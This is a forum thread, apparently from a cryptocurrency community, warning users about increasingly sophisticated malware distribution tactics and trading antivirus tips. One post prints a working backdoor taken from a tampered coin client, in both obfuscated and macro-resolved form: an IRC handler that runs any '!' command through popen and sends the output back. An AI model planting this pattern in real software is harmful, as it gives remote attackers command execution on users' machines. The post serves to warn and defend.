Beware of Increasingly Sophisticated Malware Infection Attempts

[innoxious06]

does anyone here tried cisco amp?

[paulus51]

Tell me, is it so MAC OS is not protected from such attempts to harm? It seemed to me that Apple's products are quite protected

[3zy]

recenlty I was a victim of this.

[v.stekelenburg]

The malware and cryptoware threat is absolutely there. The first thing you should do is regularly make a backup of your files.
Besides that I recommend Malwarebytes or Heimdal Security Pro software together with your antivirus program. Those two will actively ... uhh, how do you say it in English? Scan or real-time check your status.
When you are the unlucky one who’s Dropbox is encrypted by Cryptoware.. Dropbox can put back a backup until 30 days I believe. Don’t wait to long contacting them.

For password use a password safe like Enpass or 1password. Copy paste your password is safer than type it out. You can also use a virtual keyboard for that or for your credit card codes. A keylogger will see only the ‘clicks’ then ☺︎

[HERMESH KAUR]

Some steps must be taken which are good enough to protect your systems to be hacked such as not to use unknown exe, use of linux which seems to be less vunarable to virus.

[rapi]

I am happy to have made this decision. It will greatly improve my performance

[neuran]

Why can't we just get along

[RieraMusic]

I need my hardwallet now, too many risk in this crypto world, many scammers out there  lol

[Dharn]

this is very helpful. am very carefree while on the net. but with this information i will be more cautious

[mworld12]

In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:

Code:

if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
	CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
	if (buf) {
		std::string result = "";
		while (!feof(buf))
			if (fgets(pszName, sizeof(pszName), buf) != NULL)
				result += pszName;
		CFree(buf);
		strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
		if (strchr(pszName, '!'))
			*strchr(pszName, '!') = '\0';
		Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
	}
}

here is the source code with macros resolved:

Code:

if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
	FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
	if (buf) {
		std::string result = "";
		while (!feof(buf))
			if (fgets(pszName, sizeof(pszName), buf) != NULL)
				result += pszName;
		pclose(buf);
		strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
		if (strchr(pszName, '!'))
			*strchr(pszName, '!') = '\0';
		Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
	}
}

The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

good to know thank you

[bramgg.crypto]

Thank you for this post. I'm kind of a security geek but reading about these attemtps to steal crypto stash made me even more aware of the dangers of not researching something and just go ahead and install random stuff.

[spanolesbaluko]

Hello Crypto Investors.

Whenever convenient, provide me with more info on the following ICO's:

1. LiveEdu
2. RestartEnergy
3. Giftz
4. ATF
5. Cointed
6. RedChain
7. Titanium

[galwaygolfer]

Whats everyone's view of best virus protection against malware? I switched to Bitdefender several months ago and it had blocked several sites. The only downside i have come across, is the blocking of some of the wallet files. It can be a bit fiddly in adding them to trust.

[agadinata]

i've same problem. in my task manager i got "winconhost". its that the malware or not?

[mega_carnation]

Whats everyone's view of best virus protection against malware?

Paid or free? For paid one I'll stick with ESET, I had it on my laptop but for free one and you are using Windows 10, Windows Defender (a built in anti virus) is enough.

I switched to Bitdefender several months ago and it had blocked several sites. The only downside i have come across, is the blocking of some of the wallet files. It can be a bit fiddly in adding them to trust.

If Bitdefender is doing that to wallet files that's risky if you had your coins out there, try Malwarebytes.

[3zy]

I got mine today via Speedcoin but didn't able to get a screenshot deleted it right away.

[hodlcoinfan]

Thanks for the heads up!

[Still_Alone]

Thanks this was very informative. I guess this forum is a big target for malware developers who want to steal easy crypto money.

very useful information for me. so we should be more careful to be aware of the increasingly sophisticated malware infections today

[Raul Lopez]

Is there still malware infection attempst? Thank you!!

[blockchainlion.com]

Is there still malware infection attempst? Thank you!!

yes of course!!! Be always careful about files that you dowload from the internet AND links that you find on the internet.

Files because of course a malicious file can execute code that creates a backdoor access for attackers or compromises your system.
Links because when you click a link you send a request to a certain server. The server knows your IP address and can start scanning it to find open ports and vulnerabilities, which can ultimately used to run exploits against you and compromise you in many ways.
Also links can simply be phishing attempts, which means you go to a login webpage that looks familiar and put your credentials. These credentials are immediately stolen because the page is crafted by an attacker.